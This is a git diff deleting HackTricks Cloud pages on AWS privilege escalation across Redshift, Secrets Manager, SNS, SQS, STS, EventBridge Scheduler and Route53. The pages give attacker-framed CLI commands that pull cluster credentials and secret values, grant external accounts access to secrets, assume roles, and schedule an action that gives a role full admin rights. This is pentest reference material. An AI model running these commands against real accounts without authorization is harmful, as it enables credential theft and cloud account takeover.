- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Organizations - -For more information check: - -{% content-ref url="../aws-services/aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md) -{% endcontent-ref %} - -## From management Account to children accounts - -If you compromise the root/management account, chances are you can compromise all the children accounts.\ -To [**learn how check this page**](../#compromising-the-organization). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md deleted file mode 100644 index e5098c244..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md +++ /dev/null @@ -1,135 +0,0 @@ -# AWS - Redshift Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Redshift - -For more information about RDS check: - -{% content-ref url="../aws-services/aws-redshift-enum.md" %} -[aws-redshift-enum.md](../aws-services/aws-redshift-enum.md) -{% endcontent-ref %} - -### `redshift:DescribeClusters`, `redshift:GetClusterCredentials` - -With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it: - -```bash -# Get creds -aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1 -# Connect, even if the password is a base64 string, that is the password -psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439 -``` - -**Potential Impact:** Find sensitive info inside the databases. - -### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM` - -With these permissions you can get **info of all the clusters** and **get credentials** to access it.\ -Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has. - -```bash -# Get creds -aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1 -# Connect, even if the password is a base64 string, that is the password -psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439 -``` - -**Potential Impact:** Find sensitive info inside the databases. - -### `redshift:DescribeClusters`, `redshift:ModifyCluster?` - -It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet): - -``` -aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’; -``` - -**Potential Impact:** Find sensitive info inside the databases. - -## Accessing External Services - -{% hint style="warning" %} -To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned. - -Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` -{% endhint %} - -### Lambdas - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r\_CREATE\_EXTERNAL\_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like: - -```sql -CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT) -RETURNS INT -STABLE -LAMBDA 'lambda_function' -IAM_ROLE default; -``` - -### S3 - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**: - -```sql -# Read -copy table from 's3:///load/key_prefix' -credentials 'aws_iam_role=arn:aws:iam:::role/' -region '' -options; - -# Write -unload ('select * from venue') -to 's3://mybucket/tickit/unload/venue_' -iam_role default; -``` - -### Dynamo - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t\_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**: - -```sql -copy favoritemovies -from 'dynamodb://ProductCatalog' -iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole'; -``` - -{% hint style="warning" %} -The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located. -{% endhint %} - -### EMR - -Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) - -## References - -* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md deleted file mode 100644 index 8be266ddb..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md +++ /dev/null @@ -1,75 +0,0 @@ -# AWS - Secrets Manager Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secrets Manager - -For more info about secrets manager check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### `secretsmanager:GetSecretValue` - -An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**. - -```bash -aws secretsmanager get-secret-value --secret-id # Get value -``` - -**Potential Impact:** Access high sensitive data inside AWS secrets manager service. - -### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`) - -With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)). - -```bash -aws secretsmanager list-secrets -aws secretsmanager get-resource-policy --secret-id -aws secretsmanager put-resource-policy --secret-id --resource-policy file:///tmp/policy.json -``` - -policy.json: - -```json -{ - "Version" : "2012-10-17", - "Statement" : [ { - "Effect" : "Allow", - "Principal" : { - "AWS" : "arn:aws:iam:::root" - }, - "Action" : "secretsmanager:GetSecretValue", - "Resource" : "*" - } ] -} -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md deleted file mode 100644 index bdbe2bea2..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md +++ /dev/null @@ -1,71 +0,0 @@ -# AWS - SNS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -For more information check: - -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} - -### `sns:Publish` - -An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. - -```bash -aws sns publish --topic-arn --message -``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. - -### `sns:Subscribe` - -An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. - -{% code overflow="wrap" %} -```bash -aws sns subscribe --topic-arn --protocol --endpoint -``` -{% endcode %} - -**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic. - -### `sns:AddPermission` - -An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions. - -```css -aws sns add-permission --topic-arn --label --aws-account-id --action-name -``` - -**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md deleted file mode 100644 index 258084f11..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md +++ /dev/null @@ -1,74 +0,0 @@ -# AWS - SQS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -For more information check: - -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} - -### `sqs:AddPermission` - -An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities. - -{% code overflow="wrap" %} -```bash -cssCopy codeaws sqs add-permission --queue-url --actions --aws-account-ids --label -``` -{% endcode %} - -**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. - -### `sqs:SendMessage` , `sqs:SendMessageBatch` - -An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. - -```bash -aws sqs send-message --queue-url --message-body -aws sqs send-message-batch --queue-url --entries -``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. - -### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` - -An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. - -```bash -aws sqs receive-message --queue-url -aws sqs delete-message --queue-url --receipt-handle -aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout -``` - -**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md deleted file mode 100644 index 1162ac6fe..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md +++ /dev/null @@ -1,153 +0,0 @@ -# AWS - STS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## STS - -### `sts:AssumeRole` - -Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**). - -For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role. - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] -} -``` - -You can impersonate a role running: - -```bash -aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname -``` - -**Potential Impact:** Privesc to the role. - -{% hint style="danger" %} -Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\ -With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role. -{% endhint %} - -### **`sts:GetFederationToken`** - -With this permission it's possible to generate credentials to impersonate any user: - -```bash -aws sts get-federation-token --name -``` - -This is how this permission can be given securely without giving access to impersonate other users: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "VisualEditor0", - "Effect": "Allow", - "Action": "sts:GetFederationToken", - "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" - } - ] -} -``` - -### `sts:AssumeRoleWithSAML` - -A trust policy with this role grants **users authenticated via SAML access to impersonate the role.** - -An example of a trust policy with this permission is: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "OneLogin", - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" - }, - "Action": "sts:AssumeRoleWithSAML", - "Condition": { - "StringEquals": { - "SAML:aud": "https://signin.aws.amazon.com/saml" - } - } - } - ] -} -``` - -To generate credentials to impersonate the role in general you could use something like: - -```bash -aws sts assume-role-with-saml --role-arn --principal-arn -``` - -But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): - -{% code overflow="wrap" %} -```bash -onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600 -``` -{% endcode %} - -**Potential Impact:** Privesc to the role. - -### `sts:AssumeRoleWithWebIdentity` - -This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. [Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) - -For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like: - -{% code overflow="wrap" %} -```bash -aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token -# The role name can be found in the metadata of the configuration of the pod -``` -{% endcode %} - -### Federation Abuse - -{% content-ref url="../aws-basic-information/aws-federation-abuse.md" %} -[aws-federation-abuse.md](../aws-basic-information/aws-federation-abuse.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md deleted file mode 100644 index 9173fadf5..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md +++ /dev/null @@ -1,75 +0,0 @@ -# AWS - EventBridge Scheduler Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EventBridge Scheduler - -More info EventBridge Scheduler in: - -{% content-ref url="../aws-services/eventbridgescheduler-enum.md" %} -[eventbridgescheduler-enum.md](../aws-services/eventbridgescheduler-enum.md) -{% endcontent-ref %} - -### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) - -An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action - -For example, they could configure the schedule to **invoke a Lambda function** which is a templated action: - -```bash -aws scheduler create-schedule \ - --name MyLambdaSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:lambda:::function:", - "RoleArn": "arn:aws:iam:::role/" - }' -``` - -In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy: - -```bash -aws scheduler create-schedule \ - --name GrantAdminToTargetRoleSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", - "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", - "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" - }' -``` - -## References - -* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) -* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md deleted file mode 100644 index 4a13f8e5c..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md +++ /dev/null @@ -1,59 +0,0 @@ -# AWS - Route53 Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -For more information about Route53 check: - -{% content-ref url="../aws-services/aws-route53-enum.md" %} -[aws-route53-enum.md](../aws-services/aws-route53-enum.md) -{% endcontent-ref %} - -### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate` - -{% hint style="info" %} -To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic. -{% endhint %} - -Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs` - -Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions. - -This is possible because: - -* AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) -* Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names -* Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names - -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. - -#### Exploitation - -Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/README.md b/pentesting-cloud/aws-security/aws-services/README.md deleted file mode 100644 index 67243cb53..000000000 --- a/pentesting-cloud/aws-security/aws-services/README.md +++ /dev/null @@ -1,57 +0,0 @@ -# AWS - Services - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
